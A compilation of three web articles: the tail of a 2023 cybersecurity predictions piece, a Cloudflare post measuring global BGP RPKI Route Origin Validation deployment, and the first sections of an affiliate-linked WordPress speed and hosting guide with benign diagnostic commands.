With the rise in ransomware threats comes the increased use of Ransomware-as-a-Service (RaaS). This growing phenomenon is when ransomware criminals lease out their infrastructure to other cybercriminals or groups. RaaS kits make it even easier for threat actors to deploy their attacks quickly and affordably, which is a dangerous combination to combat for anyone leading the cybersecurity protocols and procedures. To increase protection against threat actors who use RaaS, enlist the help of your end-users.

End-users are your organization’s frontline against ransomware attacks, but they need the proper training to ensure they’re protected. Make sure your cybersecurity procedures are clearly documented and regularly practiced so users can stay aware and vigilant against security breaches. Employing backup measures like password policy software, MFA whenever possible, and email-security tools in your organization can also mitigate the onus on end-user cybersecurity.

Data privacy laws are getting stricter—get ready #

We can’t talk about cybersecurity in 2023 without mentioning data privacy laws. With new data privacy laws set to go into effect in several states over the next year, now is the time to assess your current procedures and systems to make sure they comply. These new state-specific laws are just the beginning; companies would be wise to review their compliance as more states are likely to develop new privacy laws in the years to come.

Data privacy laws often require changes to how companies store and process data, and implementing these new changes might open you up to additional risk if they are not implemented carefully. Ensure your organization adheres to proper cybersecurity protocols, including zero trust, as mentioned above.

Source :
https://thehackernews.com/2022/12/cybercrime-and-security-predictions-for.html

Helping build a safer Internet by measuring BGP RPKI Route Origin Validation

The Border Gateway Protocol (BGP) is the glue that keeps the entire Internet together. However, despite its vital function, BGP wasn’t originally designed to protect against malicious actors or routing mishaps. It has since been updated to account for this shortcoming with the Resource Public Key Infrastructure (RPKI) framework, but can we declare it to be safe yet?

If the question needs asking, you might suspect we can’t. There is a shortage of reliable data on how much of the Internet is protected from preventable routing problems. Today, we’re releasing a new method to measure exactly that: what percentage of Internet users are protected by their Internet Service Provider from these issues. We find that there is a long way to go before the Internet is protected from routing problems, though it varies dramatically by country.

Why RPKI is necessary to secure Internet routing

The Internet is a network of independently-managed networks, called Autonomous Systems (ASes). To achieve global reachability, ASes interconnect with each other and determine the feasible paths to a given destination IP address by exchanging routing information using BGP. BGP enables routers with only local network visibility to construct end-to-end paths based on the arbitrary preferences of each administrative entity that operates that equipment. Typically, Internet traffic between a user and a destination traverses multiple AS networks using paths constructed by BGP routers.

BGP, however, lacks built-in security mechanisms to protect the integrity of the exchanged routing information and to provide authentication and authorization of the advertised IP address space. Because of this, AS operators must implicitly trust that the routing information exchanged through BGP is accurate. As a result, the Internet is vulnerable to the injection of bogus routing information, which cannot be mitigated by security measures at the client or server level of the network.

An adversary with access to a BGP router can inject fraudulent routes into the routing system, which can be used to execute an array of attacks, including:

  • Denial-of-Service (DoS) through traffic blackholing or redirection,
  • Impersonation attacks to eavesdrop on communications,
  • Machine-in-the-Middle exploits to modify the exchanged data, and subvert reputation-based filtering systems.

Additionally, local misconfigurations and fat-finger errors can be propagated well beyond the source of the error and cause major disruption across the Internet.

Such an incident happened on June 24, 2019. Millions of users were unable to access Cloudflare address space when a regional ISP in Pennsylvania accidentally advertised routes to Cloudflare through their capacity-limited network. This was effectively the Internet equivalent of routing an entire freeway through a neighborhood street.

Traffic misdirections like these, either unintentional or intentional, are not uncommon. The Internet Society’s MANRS (Mutually Agreed Norms for Routing Security) initiative estimated that in 2020 alone there were over 3,000 route leaks and hijacks, and new occurrences can be observed every day through Cloudflare Radar.

The most prominent proposals to secure BGP routing, standardized by the IETF, focus on validating the origin of the advertised routes using Resource Public Key Infrastructure (RPKI) and verifying the integrity of the paths with BGPsec. Specifically, RPKI (defined in RFC 7115) relies on a Public Key Infrastructure to validate that an AS advertising a route to a destination (an IP address space) is the legitimate owner of those IP addresses.

RPKI has been defined for a long time but lacks adoption. It requires network operators to cryptographically sign their prefixes, and routing networks to perform an RPKI Route Origin Validation (ROV) on their routers. This is a two-step operation that requires coordination and participation from many actors to be effective.

The two phases of RPKI adoption: signing origins and validating origins

RPKI has two phases of deployment: first, an AS that wants to protect its own IP prefixes can cryptographically sign Route Origin Authorization (ROA) records thereby attesting to be the legitimate origin of that signed IP space. Second, an AS can avoid selecting invalid routes by performing Route Origin Validation (ROV, defined in RFC 6483).

With ROV, a BGP route received by a neighbor is validated against the available RPKI records. A route that is valid or missing from RPKI is selected, while a route with RPKI records found to be invalid is typically rejected, thus preventing the use and propagation of hijacked and misconfigured routes.

One issue with RPKI is the fact that implementing ROA is meaningful only if other ASes implement ROV, and vice versa. Therefore, securing BGP routing requires a united effort, and a lack of broader adoption disincentivizes ASes from committing the resources to validate their own routes. Conversely, increasing RPKI adoption can lead to network effects and accelerate RPKI deployment. Projects like MANRS and Cloudflare’s isbgpsafeyet.com are promoting good Internet citizenship among network operators, and make the benefits of RPKI deployment known to the Internet. You can check whether your own ISP is being a good Internet citizen by testing it on isbgpsafeyet.com.

Measuring the extent to which both ROA (signing of addresses by the network that controls them) and ROV (filtering of invalid routes by ISPs) have been implemented is important to evaluating the impact of these initiatives, developing situational awareness, and predicting the impact of future misconfigurations or attacks.

Measuring ROAs is straightforward since ROA data is readily available from RPKI repositories. Querying RPKI repositories for publicly routed IP prefixes (e.g. prefixes visible in the RouteViews and RIPE RIS routing tables) allows us to estimate the percentage of addresses covered by ROA objects. Currently, there are 393,344 IPv4 and 86,306 IPv6 ROAs in the global RPKI system, covering about 40% of the globally routed prefix-AS origin pairs [1].

Measuring ROV, however, is significantly more challenging given it is configured inside the BGP routers of each AS, not accessible by anyone other than each router’s administrator.

Measuring ROV deployment

Although we do not have direct access to the configuration of everyone’s BGP routers, it is possible to infer the use of ROV by comparing the reachability of RPKI-valid and RPKI-invalid prefixes from measurement points within an AS [2].

Consider the following toy topology as an example, where an RPKI-invalid origin is advertised through AS0 to AS1 and AS2. If AS1 filters and rejects RPKI-invalid routes, a user behind AS1 would not be able to connect to that origin. By contrast, if AS2 does not reject RPKI invalids, a user behind AS2 would be able to connect to that origin.

While occasionally a user may be unable to access an origin due to transient network issues, if multiple users act as vantage points for a measurement system, we would be able to collect a large number of data points to infer which ASes deploy ROV.

If, in the figure above, AS0 filters invalid RPKI routes, then vantage points in both AS1 and AS2 would be unable to connect to the RPKI-invalid origin, making it hard to distinguish if ROV is deployed at the ASes of our vantage points or in an AS along the path. One way to mitigate this limitation is to announce the RPKI-invalid origin from multiple locations from an anycast network taking advantage of its direct interconnections to the measurement vantage points as shown in the figure below. As a result, an AS that does not itself deploy ROV is less likely to observe the benefits of upstream ASes using ROV, and we would be able to accurately infer ROV deployment per AS [3].

Note that it’s also important that the IP address of the RPKI-invalid origin should not be covered by a less specific prefix for which there is a valid or unknown RPKI route, otherwise even if an AS filters invalid RPKI routes its users would still be able to find a route to that IP.

The measurement technique described here is the one implemented by Cloudflare’s isbgpsafeyet.com website, allowing end users to assess whether or not their ISPs have deployed BGP ROV.

The isbgpsafeyet.com website itself doesn’t submit any data back to Cloudflare, but recently we started measuring whether end users’ browsers can successfully connect to invalid RPKI origins when ROV is present. We use the same mechanism as is used for global performance data [4]. In particular, every measurement session (an individual end user at some point in time) attempts a request to both valid.rpki.cloudflare.com, which should always succeed as it’s RPKI-valid, and invalid.rpki.cloudflare.com, which is RPKI-invalid and should fail when the user’s ISP uses ROV.

This allows us to have continuous and up-to-date measurements from hundreds of thousands of browsers on a daily basis, and develop a greater understanding of the state of ROV deployment.
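You can also try a rough manual version of the same check from your own connection (a sketch, not the measurement pipeline described above; transient network issues can skew a single attempt):

# Should always succeed: this origin is RPKI-valid
curl -sI --max-time 10 https://valid.rpki.cloudflare.com >/dev/null && echo "valid origin: reachable"

# Should fail if your ISP enforces Route Origin Validation: this origin is RPKI-invalid
curl -sI --max-time 10 https://invalid.rpki.cloudflare.com >/dev/null \
  && echo "invalid origin: reachable (ROV likely not enforced)" \
  || echo "invalid origin: unreachable (ROV likely enforced)"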

The state of global ROV deployment

The figure below shows the raw number of ROV probe requests per hour during October 2022 to valid.rpki.cloudflare.com and invalid.rpki.cloudflare.com. In total, we observed 69.7 million successful probes from 41,531 ASNs.

Based on APNIC’s estimates of the number of end users per ASN, our weighted [5] analysis covers 96.5% of the world’s Internet population. As expected, the number of requests follows a diurnal pattern, which reflects established user behavior in daily and weekly Internet activity [6].

We can also see that the number of successful requests to valid.rpki.cloudflare.com (gray line) closely follows the number of sessions that issued at least one request (blue line), which works as a smoke test for the correctness of our measurements.

As we don’t store the IP addresses that contribute measurements, we don’t have any way to count individual clients and large spikes in the data may introduce unwanted bias. We account for that by capturing those instants and excluding them.

Overall, we estimate that out of the four billion Internet users, only 261 million (6.5%) are protected by BGP Route Origin Validation, but the true state of global ROV deployment is more subtle than this.

The following map shows the fraction of dropped RPKI-invalid requests from ASes with over 200 probes over the month of October. It depicts how far along each country is in adopting ROV but doesn’t necessarily represent the fraction of protected users in each country, as we will discover.

Sweden and Bolivia appear to be the countries with the highest level of adoption (over 80%), while only a few other countries have crossed the 50% mark (e.g. Finland, Denmark, Chad, Greece, the United States).

ROV adoption may be driven by a few ASes hosting large user populations, or by many ASes hosting small user populations. To understand such disparities, the map below plots the contrast between overall adoption in a country (as in the previous map) and median adoption over the individual ASes within that country. Countries with stronger reds have relatively few ASes deploying ROV with high impact, while countries with stronger blues have more ASes deploying ROV but with lower impact per AS.

In the Netherlands, Denmark, Switzerland, or the United States, adoption appears mostly driven by their larger ASes, while in Greece or Yemen it’s the smaller ones that are adopting ROV.

The following histogram summarizes the worldwide level of adoption for the 6,765 ASes covered by the previous two maps.

Most ASes either don’t validate at all, or have close to 100% adoption, which is what we’d intuitively expect. However, it’s interesting to observe that there are small numbers of ASes all across the scale. ASes that exhibit partial RPKI-invalid drop rate compared to total requests may either implement ROV partially (on some, but not all, of their BGP routers), or appear as dropping RPKI invalids due to ROV deployment by other ASes in their upstream path.

To estimate the number of users protected by ROV we only considered ASes with an observed adoption above 95%, as an AS with an incomplete deployment still leaves its users vulnerable to route leaks from its BGP peers.

If we take the previous histogram and summarize by the number of users behind each AS, the green bar on the right corresponds to the 261 million users currently protected by ROV according to the above criteria (686 ASes).

Looking back at the country adoption map one would perhaps expect the number of protected users to be larger. But worldwide ROV deployment is still mostly partial, lacking larger ASes, or both. This becomes even more clear when compared with the next map, plotting just the fraction of fully protected users.

To wrap up our analysis, we look at two world economies chosen for their contrasting, almost symmetrical, stages of deployment: the United States and the European Union.

112 million Internet users are protected by 111 ASes from the United States with comprehensive ROV deployments. Conversely, more than twice as many ASes from countries making up the European Union have fully deployed ROV, but end up covering only half as many users. This can be reasonably explained by end user ASes being more likely to operate within a single country rather than span multiple countries.

Conclusion

Probe requests were performed from end user browsers and very few measurements were collected from transit providers (which have few end users, if any). Also, paths between end user ASes and Cloudflare are often very short (a nice outcome of our extensive peering) and don’t traverse upper-tier networks that they would otherwise use to reach the rest of the Internet.

In other words, the methodology used focuses on ROV adoption by end user networks (e.g. ISPs) and isn’t meant to reflect the eventual effect of indirect validation from (perhaps validating) upper-tier transit networks. While indirect validation may limit the “blast radius” of (malicious or accidental) route leaks, it still leaves non-validating ASes vulnerable to leaks coming from their peers.

As with indirect validation, an AS remains vulnerable until its ROV deployment reaches a sufficient level of completion. We chose to only consider AS deployments above 95% as truly comprehensive, and Cloudflare Radar will soon begin using this threshold to track ROV adoption worldwide, as part of our mission to help build a better Internet.

When considering only comprehensive ROV deployments, some countries such as Denmark, Greece, Switzerland, Sweden, or Australia, already show an effective coverage above 50% of their respective Internet populations, with others like the Netherlands or the United States slightly above 40%, mostly driven by few large ASes rather than many smaller ones.

Worldwide we observe a very low effective coverage of just 6.5% over the measured ASes, corresponding to 261 million end users currently safe from (malicious and accidental) route leaks, which means there’s still a long way to go before we can declare BGP to be safe.

Footnotes:

[1] https://rpki.cloudflare.com/
[2] Gilad, Yossi, Avichai Cohen, Amir Herzberg, Michael Schapira, and Haya Shulman. “Are we there yet? On RPKI’s deployment and security.” Cryptology ePrint Archive (2016).
[3] Geoff Huston. “Measuring ROAs and ROV”. https://blog.apnic.net/2021/03/24/measuring-roas-and-rov/
[4] Measurements are issued stochastically when users encounter 1xxx error pages from default (non-customer) configurations.
[5] Probe requests are weighted by AS size as calculated from Cloudflare’s worldwide HTTP traffic.
[6] Quan, Lin, John Heidemann, and Yuri Pradkin. “When the Internet sleeps: Correlating diurnal networks with external factors.” In Proceedings of the 2014 Conference on Internet Measurement Conference, pp. 87-100. 2014.


Source :
https://blog.cloudflare.com/rpki-updates-data/

25 Ways To Fix A Slow WordPress Site And Pass Core Web Vitals: 2022 Advanced Guide

Welcome to the most complete guide on WordPress speed optimization!

This is my attempt to sum up WordPress speed + core web vitals in 1 post (it’s loooong).

I’ve constantly updated it to reflect new changes ever since I first published this 10 years ago. You have updates to things like core web vitals, plugin changelogs, and Cloudflare Enterprise happening every day. While site speed has gotten complex, the basics have stayed the same: use lightweight themes/plugins on fast servers (ideally with a performant cache plugin/CDN).

Why this tutorial is different:

First, my recommendations on tools/plugins/services are arguably better than what other people tell you to use. I’m very transparent about SiteGround’s slow TTFB and cache plugin, Kinsta’s overpriced service + lack of resources, NitroPack being blackhat, RocketCDN’s poor performance, and Elementor/Divi being slow. I’ve also written extensive reviews/tutorials on nearly every major host, cache plugin, CDN, and core web vital you can find in my nav menu.

Which is the 2nd reason it’s different: configuration guides! I have tons of them. Need help configuring FlyingPress, LiteSpeed Cache, or Perfmatters? Want to improve TTFB or LCP? Or maybe you’re wondering which Cloudflare settings to use. I have detailed guides on all those.

If you have suggestions on making this tutorial better (or you have a question), drop me a comment. I’m all ears. I’m not for hire because I spend so much time writing these guides 🙂

Good luck and fair seas!

  1. Testing Tools
  2. DNS
  3. Hosting
  4. Page Builders
  5. CDN
  6. Cache Plugins
  7. Other Caching
  8. Plugins
  9. CSS + JavaScript
  10. Third-Party Code
  11. Fonts
  12. Images
  13. Videos
  14. Comments
  15. LCP
  16. CLS
  17. Preload, Prefetch, Preconnect
  18. Database
  19. Background Tasks
  20. Mobile
  21. WooCommerce
  22. Security
  23. PHP Version
  24. Make Sure Optimizations Are Working
  25. Speed Plugins
  26. Get Help
  27. My Setup

1. Testing Tools

Find bottlenecks on your site before jumping in.

  • Chrome Dev Tools – the coverage report shows your largest CSS/JS files and where they’re loaded from (plugins + third-party code are common culprits). So many parts of speed and web vitals are related to CSS/JS and it’s best to tackle it at the source. Removing things you don’t need is better than trying to optimize it.
  • KeyCDN Performance Test – measure TTFB in 10 global locations (a quick command-line alternative is sketched just after this list). This is mainly improved with better hosting and using a performant CDN with full page caching (like APO or FlyingProxy). It also shows DNS lookup times and TLS, which can be improved with a fast DNS (i.e. Cloudflare) and configuring their SSL/TLS settings.
  • PageSpeed Insights – most items come down to reducing or optimizing CSS, JS, fonts, images, TTFB, and above the fold content. For example, preload your LCP image and exclude it from lazy load, then move large plugins/elements below the fold so they can be delayed. Focus on recommendations in PSI’s opportunities + diagnostics sections, and monitor your core web vitals report in Search Console.
  • CLS Debugger – see your website’s layout shifts (CLS) on mobile/desktop in a GIF.
  • WP Hive – Chrome extension that lets you search the WordPress plugin repository and see whether a plugin impacts memory usage and PageSpeed scores, but only measures “out of the box settings” and not when content is added to the frontend.
  • Wordfence Live Traffic Report – see bots hitting your site in real-time. AhrefsBot, SemrushBot, compute.amazonaws.com and other bots can be blocked if you’re using their service. Since most bot protection services don’t block these service’s bots, you’ll need to do this manually with something like Cloudflare firewall rules.
  • WP-Optimize – see which plugins add database overhead and remove old tables left behind by plugins/themes you deleted. It does a better job than cache plugins at scheduled cleanups because it can keep a certain number of post revisions while removing junk (cache plugins delete them all, leaving you with no backups).
  • cdnperf.com + dnsperf.com – you can use these as a baseline for choosing a DNS/CDN provider, but they don’t include StackPath’s CDN (removed from cdnperf and used by RocketCDN), QUIC.cloud’s CDN (used with LiteSpeed), and other services.
  • Waterfall Charts – testing “scores” isn’t nearly as effective as measuring things in a Waterfall chart. Google’s video on optimizing LCP is a great resource and shows you the basics. You can find one in WebPageTest, Chrome Dev Tools, and GTmetrix.
  • Diagnostic Plugins –  the speed plugins section lists all plugins mentioned in the guide. It includes diagnostic plugins like Query Monitor (this is probably best for finding bottlenecks), WP Server Stats, WP Hosting Benchmark, and WP Crontrol.
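As a quick command-line complement to the tools above (a sketch; swap example.com for your own URL), curl can break a single request into DNS, connect, TLS, and TTFB timings:

curl -o /dev/null -s -w "dns: %{time_namelookup}s  connect: %{time_connect}s  tls: %{time_appconnect}s  ttfb: %{time_starttransfer}s  total: %{time_total}s\n" https://example.com/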

2. DNS

A slow DNS causes latency which is part of TTFB (and TTFB is part of LCP).

Whoever you registered your domain through is usually who you’re using for DNS. GoDaddy, NameCheap, and even Amazon Route 53 (used on Kinsta) don’t perform well on dnsperf.com. Better options include Cloudflare, QUIC.cloud, or Google (if using Google Domains). I usually recommend Cloudflare since it’s free and can be used on any setup by changing nameservers.
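If you want to spot-check authoritative DNS performance yourself (a sketch; ns1.example-dns.com is a placeholder for one of your domain’s real nameservers), dig reports the query time directly:

# Find your domain's authoritative nameservers
dig +short NS example.com

# Query one of them directly and read the ";; Query time:" line
dig @ns1.example-dns.com example.com +noall +stats | grep "Query time"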


3. Hosting

Rocket.net with their free Cloudflare Enterprise will outperform any “mainstream host” since you get 32 CPU cores + 128GB RAM, NVMe storage, Redis, and Cloudflare’s full page caching + Argo Smart Routing. I use them and average a <150ms global TTFB (or click through my posts).

12 things to know about hosting/TTFB

  1. Hosting is the #1 factor of site speed.
  2. TTFB is a key indicator of hosting performance.
  3. TTFB is part of core web vitals and is 40% of LCP.
  4. TTFB also affects INP (since latency is part of TTFB).
  5. SpeedVitals tests TTFB in 35 locations – use this tool!
  6. Test your site 3 times to get accurate numbers in SpeedVitals.
  7. Doing this ensures your caching and CDN are working properly.
  8. Check your average TTFB worldwide in your 3rd SpeedVitals test.
  9. Google flags your TTFB if it’s over 600ms, but under 200ms is better.
  10. PageSpeed Insights (and other testing tools) only test TTFB in 1 location.
  11. WP Hosting Benchmark also tests hosting performance (here are my results).
  12. Combining a good host/CDN is arguably the best way to improve TTFB (using a host with improved specs on top of Cloudflare Enterprise hits 2 birds with 1 stone).

Mainstream hosts (like SiteGround, Hostinger, and WPX) don’t have a lot of CPU/RAM, use slower SATA SSDs, and are shared hosting with strict CPU limits which force you to upgrade plans. Cloud hosting is faster, but Kinsta still uses SATA SSDs with low CPU/RAM, PHP workers, and monthly visits (Redis also costs $100/month). Cloudways Vultr HF is who I previously used, but again, they start with only 1 CPU + 1GB RAM on slower Apache servers, PHP-FPM, and GZIP.

Here are Rocket.net’s specs:

All plans use 32 CPU cores + 128GB RAM with NVMe (faster than SATA), Redis (better than memcached), LiteSpeed’s PHP, and Brotli (smaller compression than GZIP). They have no PHP worker limits since only about 10% of traffic hits your origin due to their Cloudflare Enterprise.

| | SiteGround | Hostinger | Kinsta | Cloudways Vultr HF | Rocket.net |
| --- | --- | --- | --- | --- | --- |
| Hosting type | Shared | Shared | Cloud | Cloud | Private cloud |
| Storage | SATA | SATA | SATA | NVMe | NVMe |
| CPU cores | Not listed | 1-2 | 12 | 1 | 32 |
| RAM (GB) | Not listed | .768 – 1.536 | 8 | 1 | 128 |
| Object cache | Memcached | x | Redis ($100/mo) | Redis (Pro) | Redis |
| Server | Nginx | LiteSpeed | Nginx | Apache | Nginx |
| PHP processing | FastCGI | LiteSpeed | FastCGI | FPM | LiteSpeed |
| Compression | Brotli | Brotli | Brotli | GZIP | Brotli |
| CPU limits | Very common | Low memory | Low PHP workers | Average | None |

 
Why you need Cloudflare Enterprise

Because you get Enterprise features like 270+ PoPs, prioritized routing, full page caching, HTTP/3, WAF, and image optimization. Three problems with most CDNs are a small network (PoPs), no full page caching, and no image optimization. For example, WP Rocket's RocketCDN uses StackPath, which was removed from cdnperf.com, doesn't include image optimization, and has a mediocre capacity of 65+ Tbps. SiteGround's CDN only has 14 PoPs. QUIC.cloud CDN (for LiteSpeed) and BunnyCDN are good, but they still don't beat Cloudflare Enterprise. Sure, you can pay $5/mo for Cloudflare's APO, but you're still missing out on all other Enterprise features.

3 popular hosts with Cloudflare Enterprise

Rocket.net's Cloudflare Enterprise is free, set up automatically, and uses full page caching (unlike Cloudways). And unlike Kinsta's, Rocket.net's setup includes Argo Smart Routing (specifically good for WooCommerce sites), load balancing, and image optimization. Rocket.net CEO Ben Gabler also used to be StackPath's Chief Product Officer and went as far as building Rocket.net's data centers in the same locations as Cloudflare's. And unlike both hosts, Rocket.net doesn't limit PHP workers (there are no CPU limits) and monthly visit limits are 10-25 times higher than Kinsta's.

Feature | Cloudflare Enterprise (Kinsta) | Cloudflare Enterprise (Cloudways) | Cloudflare Enterprise (Rocket.net)
CDN PoPs | 270 | 270 | 270
Prioritized routing | ✓ | ✓ | ✓
Full page caching | ✓ | x | ✓
HTTP/3 | ✓ | ✓ | ✓
WAF | ✓ | ✓ | ✓
Argo smart routing | x | ✓ | ✓
Load balancing | x | ✓ | ✓
Image optimization | x | ✓ | ✓
Automatic configuration | x | x | ✓
Price | Free | $5/mo (1 domain) | Free

 
Problems with mainstream hosts

I've written some pretty critical reviews about SiteGround's slow TTFB, CPU limits, and why SG Optimizer does a poor job with core web vitals (they also control several Facebook Groups and threaten to sue people who write bad reviews). Hostinger writes fake reviews and is only cheap because you get fewer resources like CPU/RAM. Kinsta and WP Engine are way too expensive for how few resources, PHP workers, and monthly visits you get. Then there are major incidents like WPX's worldwide outage and SiteGround's DNS getting blocked by Google for 4 days (both WPX and SiteGround denied responsibility). One thing is clear: most mainstream hosts appear to be more interested in profits than performance. Please do your own research before taking anyone's advice.

Getting started on Rocket.net

Step 1: Create a Rocket.net account and you’ll be prompted to add a coupon. Sign up with coupon OMM1 to get your first month for $1 (renews at $30/mo or $25/mo when paying yearly). If you sign up with my coupon or affiliate links, I get a commission which I seriously appreciate.


Step 2: Request a free migration. They did this the same day and let me review my website before it was launched with no downtime. For the record, their support is better than Kinsta’s and you can reach out to Ben Gabler or his team (via phone/chat/email) if you have questions.

Step 3: Upgrade to PHP 8.1 and ask support to install Redis (they use Redis Object Cache). These are the only things I did since Cloudflare Enterprise and backups are both automatic.

Step 4: Retest your TTFB in SpeedVitals and click through your pages to see the difference. You can also search Rocket.net's TrustPilot profile (where they're rated 4.9/5) for people mentioning "TTFB".

https://youtube.com/watch?v=AT3LycPIR2E

I was previously on Cloudways Vultr HF which was great, but their Cloudflare Enterprise doesn't use full page caching (yet) and costs $5/mo with annoying challenge pages. Even if their Cloudflare Enterprise were identical, Rocket.net still outperforms them with better specs like more CPU/RAM, Brotli, and LiteSpeed's PHP (plus better support, an easier dashboard, and usually better pricing). While Cloudways is a big improvement over most hosts, you're already spending $18/mo for Vultr HF's lowest 1 CPU plan with Cloudflare Enterprise. At that point, the extra $7/mo you'd be spending at Rocket.net is worth it.

For small sites on a budget, NameHero's Turbo Cloud plan is similar to Hostinger in terms of LiteSpeed, cPanel, and pricing. However, NameHero's Turbo Cloud plan has about 1.5x more resources (3 CPU + 3GB RAM) with NVMe storage, and NameHero's support/uptimes are also better, as shown in TrustPilot reviews. This is one of the fastest setups on a budget… you get a LiteSpeed server + LiteSpeed Cache + QUIC.cloud CDN, and email hosting. The main con is their data centers are only in the US and Netherlands. If these aren't close to your visitors, make sure to set up QUIC.cloud's CDN which has HTML caching (ideally the paid plan which uses all 70 PoPs).


4. Page Builders

Elementor/Divi are slower than Gutenberg/Oxygen.

Since multiple PSI items are related to CSS/JS/fonts, many people are replacing them with lightweight alternatives. The last thing you want to do is use a slow page builder then install a bunch of “extra functionality plugins” which add even more CSS/JS. Don’t fall into this trap. If you don’t want to ditch your page builder completely, there are still ways you can optimize it.

  • Divi/Elementor add extra CSS/JS/fonts to your site.
  • Adding more page builder plugins can slow it down more.
  • GeneratePress (what I use), Kadence, Blocksy, Oxygen are faster.
  • If using Elementor, try the settings under Elementor → Experiments.
  • Same thing with Divi (Divi → Theme Options → General → Performance).
  • If using Astra Starter Sites, use a template built in Gutenberg (not Elementor).
  • Use CSS for your header/footer/sidebar (instead of bloated page builder code).
  • Elementor has a theme customizer setting to host fonts locally + preload them.
  • If you don’t use Elementor font icons, disable them or use custom icons instead.
  • If you don’t use elementor-dialog.js for popups, disable it (i.e. using Perfmatters).
  • Many page builder plugins are module-based, so disable modules you don’t use.
  • Simplify your design by using fewer widgets/columns (here's a YouTube video on it).
  • If you preload critical images in FlyingPress or Perfmatters, this excludes above the fold images from lazy load and preloads them to improve LCP. However, it doesn’t work with Elementor image widgets (go through your page builder + cache plugin documentation).
  • Background images aren't lazy loaded by default because they're loaded from a separate CSS file. Some cache plugins support a lazy-bg class you can use to lazy load backgrounds (see the sketch after this list).
  • WP Johnny offers page builder removal services but he’s expensive and usually a busy guy.
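As a rough sketch of that helper-class approach (the markup is hypothetical – FlyingPress uses a lazy-bg class, but check your cache plugin's documentation for the exact class it supports):

<!-- Hypothetical hero section with a CSS background image; the helper class tells the cache plugin to lazy load it -->
<div class="hero-section lazy-bg">...</div>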
Use the coverage report to find page builder plugins adding CSS/JS

5. CDN

Have a slow TTFB in KeyCDN’s performance test?

A performant CDN with HTML caching (and other CDN features) can be the difference maker. While cdnperf.com is a good baseline, there are other things to consider.

Start by looking at their network page (you'll see BunnyCDN's network has more PoPs and a faster Tbps capacity than StackPath). Also look at the features (for example, RocketCDN only serves files from the CDN and nothing else, while other CDNs do a lot more than just "serving files"). Cloudflare's dashboard has hundreds of optimizations to improve speed, security, and CPU usage. Aside from choosing a good CDN, make sure to also take advantage of everything it offers. Or just use a service like FlyingProxy/Rocket.net that integrates Cloudflare Enterprise.

CDN | PoPs | Price | Rating
Cloudflare | 270 | Freemium | 2.1
BunnyCDN | 93 | $.01 – $.06/GB | 4.8
QUIC.cloud | 70 | Free or $.02 – $.08/GB | 3.0
Google Cloud CDN | 100+ | Varies where purchased | N/A
CloudFront | 310 | Free 50GB/yr then $0.02 – $.16/GB | 4.4
KeyCDN | 40 | $.01 – $.11/GB | 4.5
StackPath (used by RocketCDN) | 50 | Varies where purchased or $7.99/mo | 2.3
SiteGround CDN | 14 | Free on SiteGround | N/A
WPX XDN | 25 | Free on WPX | N/A

Cloudflare – it’s hard to beat Cloudflare with 270+ data centers and all the robust features. Open your Cloudflare dashboard and use the recommendations below to configure settings.

Free Cloudflare Features I Recommend Using

  • CDN – in your DNS settings, find your domain and change the proxy status to Proxied (orange cloud). This is needed for several Cloudflare features to work.
  • TLS version – set minimum TLS version to 1.2 and make sure TLS 1.3 is enabled.
  • Firewall rules – often used to block access to wp-login, XML-RPC, and "hacky" countries. Firewalls block attacks along with unwanted requests to the server (a sample rule follows this list).
  • Bot protection – block spammy bots from hitting your server. I would also check your Wordfence live traffic report to see bots hitting your website in real time and manually block bots like AhrefsBot + SemrushBot if you don’t use them. Bot fight mode can add a JS file to your site (invisible.js) and cause PSI errors (so test this).
  • Brotli – this only works if your host supports Brotli, otherwise GZIP will be used.
  • Early hints – while the server is waiting for a response, preload/preconnect hints are sent to the browser so resources load sooner, reducing your server think time.
  • Browser cache TTL – 1 year is good for static sites (my blog is mostly static so this is what I use) or use 1 month for dynamic sites. This is recommended by Google and can fix serve static assets with an efficient cache policy in PageSpeed Insights.
  • Crawler hints – helps search engines efficiently time crawling and save resources.
  • Cache reserve – improves cache hit ratio by making sure specific content is being served from Cloudflare even when the content hasn’t been requested for months.
  • Workers – deploy code on Cloudflare’s edge servers (try the playground). Workers are serverless with automatic scaling + load balancing. Obviously involves coding knowledge and can reduce LCP by 80%. It can also be used for external cron jobs.
  • Cache everything page rule – most common page rule which caches HTML and improves TTFB, but I recommend APO or Super Page Cache for Cloudflare instead.
  • HTTP/3 – not true HTTP/3 but still a nice feature (test your site using HTTP/3 test).
  • 0-RTT connection resumption – good for repeat visitors, latency, mobile speed.
  • Hotlink protection – saves bandwidth by stopping people from copying your images and using them on their own website while they’re hosted on your server.
  • Zaraz – offload third-party scripts to Cloudflare like Google Analytics, Facebook Pixel, chatbots, and custom HTML. But test your results against delaying these.
  • Monitor bandwidth/analytics – the more bandwidth you offload to Cloudflare the better. This should lighten the load on your server while reducing CPU usage.
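As a sketch of the wp-login rule mentioned above (the IP is a placeholder – create it as a firewall/custom rule in the Cloudflare dashboard with the action set to Block):

(http.request.uri.path contains "/wp-login.php" and ip.src ne 203.0.113.7)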

Paid Cloudflare Features

  • APO – caches HTML which can improve TTFB in multiple global locations.
  • WAF – block unwanted requests, improve security, and reduce CPU usage.
  • Argo + Tiered Cache – route traffic using efficient paths with Tiered Cache.
  • Image optimizations – I prefer these over plugins. Between all 3 (image resizing, Mirage, Polish), you don’t have to use a bloated image optimization plugin and they usually do a better job. You have features like compression/WebP and they also have mobile optimizations like serving smaller images to reduce mobile LCP.
  • Signed Exchanges – improves LCP when people click links in Google’s search results via prefetching which Google says can lead to a substantial improvement.
  • Load Balancing – creates a failover so your traffic is re-routed from unhealthy origins to healthy origins. Can reduce things like latency, TLS, and general errors.
  • Cloudflare Enterprise – major benefits include prioritized routing, more PoPs, Argo + Tiered Cache, full page caching, image optimization, and other features depending where you get it from. The easiest/cheapest way is to use a host with Cloudflare Enterprise or FlyingProxy (I recommend Rocket.net's, which even built its data centers in the same locations as Cloudflare's). It's just more thought out than Cloudways/Kinsta. You could also consider using Cloudflare Pro which has some of these features. It requires more configuration but gives you more control.

BunnyCDN – Gijo suggests Cloudflare + BunnyCDN which is what I've used for a long time. If you're using FlyingPress, FlyingCDN is powered by BunnyCDN with Bunny Optimizer + geo-replication. It's also cheaper than buying these directly through BunnyCDN and easy to set up.


QUIC.cloud – use this if you’re on LiteSpeed. You’ll want to use the standard (paid) plan since the free plan only uses 6 PoPs and doesn’t have DDoS protection. It has HTML caching which is similar to Cloudflare’s full page caching and is also needed for LSC’s image/page optimizations.


RocketCDN – uses StackPath which was removed from cdnperf.com and has fewer PoPs, slower Tbps capacity, no image optimization, no HTML caching, and no other features besides serving files from a CDN. It also isn't "unlimited" like WP Rocket advertises since they will cut you off at some point.

